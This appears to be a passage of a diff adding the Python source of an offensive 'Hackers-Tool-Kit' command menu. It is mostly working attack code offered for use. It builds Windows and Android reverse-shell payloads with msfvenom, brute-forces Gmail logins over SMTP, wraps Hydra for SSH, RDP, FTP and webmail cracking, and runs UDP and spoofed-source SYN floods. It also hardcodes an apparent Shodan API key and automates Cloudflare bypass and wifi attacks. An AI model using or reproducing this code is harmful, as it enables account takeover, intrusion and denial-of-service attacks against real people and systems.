+\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + """.decode('utf-8') + + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,9) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# 